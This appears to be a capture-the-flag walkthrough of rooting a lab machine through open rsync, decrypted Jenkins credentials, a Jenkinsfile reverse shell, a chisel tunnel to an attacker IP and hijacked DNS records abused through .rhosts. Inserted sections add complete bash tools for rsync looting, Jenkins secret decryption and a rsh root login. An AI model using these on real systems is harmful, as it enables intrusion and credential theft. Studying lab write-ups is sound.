Enumeration

Nmap

The initial nmap scan showed rsync, rlogin, HTTP on port 3000, SSH and DNS open, with the MySQL port filtered.

00 - nmap

Web Enumeration

The site on port 3000 was Gitea, and its version had no usable known vulnerabilities.

01 - gitea

There was a user named buildadm and a dev repository containing a Jenkinsfile.

02 - Jenkinsfile repo and nothing else

Rsync Enumeration

I was not sure what to do with rsync, but the rsync pentesting notes from Hackviser explained that an rsync daemon exposes modules (shared directories) whose contents can be listed and copied.

Access can be authenticated or unauthenticated, so I checked whether the modules required a password. They did not, and I pulled the Jenkins backup files to my machine.

03 - rsync download
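The enumeration and download steps described above, as an added example that is not part of the original post: it lists the daemon's modules, checks which ones answer without a password (rsync prints `@ERROR: auth failed on module ...` when credentials are required), and mirrors a chosen module locally. The host, the module name and the destination directory are arguments; nothing here is tied to the real share names.

```bash
#!/usr/bin/env bash
# Added example (not from the original post): enumerate and pull an rsync share.
# Assumptions: the target runs an rsync daemon on 873; module names come from
# the listing, the "loot" directory name is just a default.
set -eu

# Module listing: "rsync host::" or "rsync rsync://host/" prints one module per
# line as "<module>\t<comment>" (a daemon MOTD, if configured, appears first).
rsync_list_modules() {            # $1 = host
  rsync --contimeout=10 "rsync://$1/"
}

# Extract module names from a listing (first field of every non-empty line).
rsync_parse_modules() {           # stdin = listing text
  awk 'NF { print $1 }'
}

# Classify rsync output: "open" when the module answered, "auth" when the daemon
# demanded a password, "error" for any other daemon error (unknown module, etc.).
rsync_classify() {                # stdin = combined rsync stdout+stderr
  out=$(cat)
  if printf '%s\n' "$out" | grep -q '^@ERROR: auth failed'; then echo auth
  elif printf '%s\n' "$out" | grep -q '^@ERROR'; then echo error
  else echo open; fi
}

# List a module's contents without copying anything.
rsync_list_files() {              # $1 = host, $2 = module
  rsync -av --contimeout=10 --list-only "rsync://$1/$2/"
}

# Mirror a module locally, keeping permissions and timestamps (-a).
rsync_pull() {                    # $1 = host, $2 = module, $3 = local dir
  mkdir -p "$3"
  rsync -av --contimeout=10 "rsync://$1/$2/" "$3/"
}

# Usage: ./rsync_enum.sh <target> [module-to-download] [dest-dir]
if [ "${1:-}" ]; then
  host=$1
  rsync_list_modules "$host" | rsync_parse_modules | while read -r m; do
    status=$(rsync_list_files "$host" "$m" 2>&1 | rsync_classify)
    echo "$m: $status"
  done
  if [ "${2:-}" ]; then rsync_pull "$host" "$2" "${3:-loot}"; fi
fi
```

Run it once with only the host to see which modules are open, then again with the module name to download it; `--list-only` first avoids pulling gigabytes from a share you only needed to inspect.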

Jenkins Decryption

I searched online for what to do with Jenkins configuration files and learned that credentials.xml stores passwords encrypted with keys kept in the Jenkins home (master.key and hudson.util.Secret), all of which were in the backup. The jenkins-credential-decryptor tool decrypts them, and running it revealed the password for the buildadm user.

04 - decrypted
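What the decryptor does under the hood, as an added example that is neither the post's nor the tool's code: it reproduces the Jenkins secret chain with openssl only. The file paths are arguments; the only assumption is that master.key, hudson.util.Secret and credentials.xml come from the same Jenkins home, as they did in the backup.

```bash
#!/usr/bin/env bash
# Added example (not the post's or jenkins-credential-decryptor's code): decrypt
# Jenkins credentials.xml values with openssl, given master.key and
# hudson.util.Secret from $JENKINS_HOME/secrets.
set -eu

# Jenkins derives the key that protects hudson.util.Secret as the first 16 bytes
# of SHA-256 over the master.key text (whitespace trimmed).  Prints 32 hex chars.
master_key_hex() {                # $1 = master.key
  tr -d '[:space:]' < "$1" | openssl dgst -sha256 | awk '{print $NF}' | cut -c1-32
}

# hudson.util.Secret is AES-128-ECB(master key) over 256 random bytes followed
# by the marker "::::MAGIC::::".  The confidentiality key used for credentials
# is the first 16 bytes of that plaintext.  Prints 32 hex chars.
secret_key_hex() {                # $1 = master.key, $2 = hudson.util.Secret
  tmp=$(mktemp)
  openssl enc -d -aes-128-ecb -K "$(master_key_hex "$1")" -in "$2" -out "$tmp"
  if [ "$(tail -c 13 "$tmp")" != '::::MAGIC::::' ]; then
    rm -f "$tmp"; echo 'hudson.util.Secret did not decrypt: wrong master.key?' >&2; return 1
  fi
  od -An -tx1 -N 16 "$tmp" | tr -d ' \n'
  rm -f "$tmp"
}

# A credentials.xml value "{AQAAABAAAA...}" (payload version 1) is base64 of:
#   1 byte version (0x01) | 4-byte IV length | 4-byte ciphertext length |
#   IV (16 bytes) | AES-128-CBC/PKCS5 ciphertext under the confidentiality key.
decrypt_secret() {                # $1 = secret key hex, $2 = "{base64}" value
  tmp=$(mktemp)
  printf '%s' "$2" | tr -d '{}' | base64 -d > "$tmp"
  if [ "$(od -An -tx1 -N 1 "$tmp" | tr -d ' \n')" != 01 ]; then
    rm -f "$tmp"; echo 'unsupported payload version (old ECB format)' >&2; return 1
  fi
  iv=$(od -An -tx1 -j 9 -N 16 "$tmp" | tr -d ' \n')
  tail -c +26 "$tmp" | openssl enc -d -aes-128-cbc -K "$1" -iv "$iv"
  rm -f "$tmp"
}

# Pull every encrypted value out of credentials.xml and decrypt each one.
decrypt_credentials_xml() {       # $1 = secret key hex, $2 = credentials.xml
  grep -o '{[A-Za-z0-9+/=]\{8,\}}' "$2" | while read -r blob; do
    printf '%s\n' "$(decrypt_secret "$1" "$blob")"
  done
}

# Usage: ./jenkins_decrypt.sh <master.key> <hudson.util.Secret> <credentials.xml>
if [ $# -eq 3 ]; then
  key=$(secret_key_hex "$1" "$2")
  decrypt_credentials_xml "$key" "$3"
fi
```

The magic-marker check is the practical sanity test: if it fails, the master.key and hudson.util.Secret are from different Jenkins instances and nothing downstream will decrypt.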

Jenkins File RevShell

I logged in to Gitea as buildadm, changed the Jenkinsfile in the dev repository so the pipeline ran a reverse-shell command, and the next build connected back to my listener.

05 - got the user flag

Privilege Escalation

Checking the environment, I found I was root inside a Docker container with very few tools available. I first checked my IP address to learn the container's subnet, which was different from the host machine's.

06 - IP check

.rhosts file

Then, searching through the filesystem, I found a .rhosts file. I did not know what it was for, so I looked it up and found this website.

A .rhosts file controls which remote hosts and users may log in through rsh or rlogin without a password. On this machine it trusted logins as root from intern.build.vl and admin.build.vl.

07 - 0 rhosts

Static Nmap

Keeping this in mind, I downloaded a statically linked nmap binary and transferred it, together with /etc/services (the container had none, and nmap falls back to it for port names when its own data files are missing), to the target container using curl.

Running it revealed the reachable internal IPs and their open ports.

07 - static nmap output

Chisel

After the scan, I ran chisel to create a SOCKS proxy with the following steps:

  1. Update /etc/proxychains4.conf so proxychains sends traffic to the chisel SOCKS port:

     #socks4 127.0.0.1 9050
     socks5  127.0.0.1 1080
    
  2. Start the reverse listener on the attacker side:

     chisel server --reverse --port 443
    
  3. Start the client in the container (the Linux chisel binary uploaded with curl), which tunnels a SOCKS endpoint back to port 1080 on the attacker:

     ./chisel client 10.10.16.11:443 R:1080:socks
    
  4. Now we can reach the internal network through proxychains4.

Then I connected to the MySQL database through the proxy.

08 - proxychains db

Checking the records, I found a password hash.

09 - cracked

I then cracked the hash with hashcat.

10 - cracked real

Internal Web Enumeration

From the nmap output we know there are some internal websites. First I set the SOCKS proxy in Firefox.

11 - set proxy

Then I visited the site, which turned out to be PowerDNS-Admin. The hash I had cracked came from the PowerDNS-Admin database, so I tried those credentials and logged in.

12 - admin

Rhosts

Earlier I found the .rhosts file inside the Docker container. Assuming the host has the same .rhosts file, if I change the intern record or add a new admin record pointing at my attacker IP, I can log in to the host as root with rsh and no password. On Linux (glibc ruserok) the rhosts check resolves the hostname listed in .rhosts and compares the result with the connecting address, so controlling the A record in the zone is enough.

So I added an admin record pointing at my machine.

13 - rhosts

Then I logged in as root with rsh and got the root flag.

14 - root txt
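The .rhosts trust and the DNS-poisoned login described above, as an added example that is not part of the original post. The parser shows what each line of a .rhosts file actually grants (a bare hostname trusts the same user name from that host, `+` is a wildcard, a leading `-` denies); the login helper first asks the target's own resolver where the trusted name points, because that forward lookup is the one the rhosts check performs. The target, DNS server, trusted name and attacker IP are arguments; `dig` and an rsh client on the attacking machine are assumed.

```bash
#!/usr/bin/env bash
# Added example (not from the post): read what a .rhosts file trusts, confirm the
# poisoned name resolves to us, then log in as root over rsh.
set -eu

# Print one "<host> <remote-user>" line per entry in a .rhosts file, following
# rhosts(5): a bare hostname trusts the same user name from that host, a second
# field names a different remote user, "+" in either column is a wildcard, and a
# leading "-" denies the host.  Comments (#) and blank lines are ignored.
rhosts_trusts() {                 # $1 = .rhosts path, $2 = local user owning it
  sed 's/#.*//' "$1" | awk -v me="$2" 'NF {
      h = $1; u = (NF >= 2) ? $2 : me
      if (substr(h, 1, 1) == "-") { printf "DENY %s\n", substr(h, 2); next }
      if (h == "+") h = "ANY-HOST"
      if (u == "+") u = "ANY-USER"
      printf "%s %s\n", h, u }'
}

# Ask a specific DNS server (the one the target uses) for the A record of a name.
# On Linux the rhosts check resolves the .rhosts hostname forward and compares
# it with the client address, so this is the lookup that decides the login.
resolve_via() {                   # $1 = dns server, $2 = name
  dig +short "@$1" "$2" A | head -n 1
}

# rsh as root.  The rsh client must bind a reserved source port, so run the
# script itself as root on the attacking machine.
rsh_root() {                      # $1 = target, $2 = command
  rsh -l root "$1" "$2"
}

# Usage: sudo ./rhosts_login.sh <target> <dns server> <trusted name> <our ip>
if [ $# -eq 4 ]; then
  got=$(resolve_via "$2" "$3")
  if [ "$got" = "$4" ]; then
    rsh_root "$1" 'id; cat /root/root.txt'
  else
    echo "$3 resolves to '$got', not $4: fix the A record first" >&2; exit 1
  fi
fi
```

Running `rhosts_trusts /root/.rhosts root` on the container is the quick way to see whether an entry is host-only (same-user trust) or a `host user` pair before deciding which DNS name to hijack.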

Pwned

The machine was compromised.

15 - pwned
